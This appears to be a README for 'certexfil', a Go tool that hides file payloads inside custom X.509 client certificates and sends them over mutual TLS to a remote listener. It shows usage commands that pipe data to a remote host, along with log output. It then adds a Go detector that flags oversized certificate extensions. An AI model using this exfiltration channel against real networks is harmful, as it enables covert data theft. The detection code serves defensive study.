This project represents my initial venture into the Go programming language, focusing on data exfiltration techniques and their countermeasures. The primary goal is to develop a fun way to hide data: a payload read from a file is encoded into a custom X.509 digital certificate.
For an in-depth discussion on the topic, refer to my Medium article: Abusing Certificates for Data Exfiltration.
For those unfamiliar with the concepts of certificates and mutual TLS (mTLS), I recommend the following resources for a thorough understanding:
Certexfil operates in three modes: CA generation, client, and listener.
--ca initializes a CA for certificate creation and authentication.
--payload incorporates a file payload into a new client certificate for mTLS with a listener service.
--listen launches a service that validates mTLS clients and extracts embedded payloads.
To create server_cert.pem and server_key.pem for mTLS:
somewhere$ certexfil -ca -ecdsa-curve P521 --host remote.host.com
Ensure the certexfil binary and ./CERTS directory are on your remote server. Then, initiate the mTLS listener:
remoteserver$ ./certexfil --listen
Embedding output as a payload:
06:46:00 jma@wintermute Go-Workspace → echo 'w00t w00t' | certexfil --host remote.server.com --payload -
2019/05/31 18:48:27 [*] Reading from stdin..
2019/05/31 18:48:27 [D] Payload (raw) --> w00t w00t... (9 bytes)
2019/05/31 18:48:27 [D] Payload (Prepare()) --> �... (31 bytes)
2019/05/31 18:48:27 [*] Generated custom cert with payload
Oo- @Sourcefrenchy
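On the countermeasure side, here is an added example that is not part of certexfil or of the original page: a Go check that flags certificates carrying unusually large extension values, the kind of anomaly an embedded payload produces. The 256-byte threshold, the function names and the padded subject key identifier in the test fixture are assumptions; the page does not say which certificate field certexfil uses.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"fmt"
	"math/big"
	"time"
)

// Assumed limit; derive the real one from a baseline of your own client certificates.
const maxExtBytes = 256

// AuditCert parses a DER certificate and reports every extension whose value exceeds
// maxExtBytes. It accepts the raw bytes a tls.Config.VerifyPeerCertificate callback receives.
func AuditCert(der []byte) ([]string, error) {
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return nil, fmt.Errorf("parse certificate: %w", err)
	}
	var findings []string
	for _, ext := range cert.Extensions {
		if n := len(ext.Value); n > maxExtBytes {
			findings = append(findings, fmt.Sprintf("serial %v: extension %s holds %d bytes", cert.SerialNumber, ext.Id, n))
		}
	}
	return findings, nil
}

// SampleCert builds a constructed, self-signed test certificate whose subject key
// identifier is skidLen zero bytes (a stand-in field chosen for this fixture).
func SampleCert(skidLen int) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), SubjectKeyId: make([]byte, skidLen),
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(time.Hour)}
	return x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
}

func main() {
	for _, n := range []int{20, 2048} { // 20 bytes is the usual SHA-1-sized identifier
		der, _ := SampleCert(n)
		fmt.Println(AuditCert(der))
	}
}
```

Legitimate certificates with many subject alternative names or embedded SCT lists can exceed a small threshold, so treat findings as leads to review against your baseline rather than as verdicts.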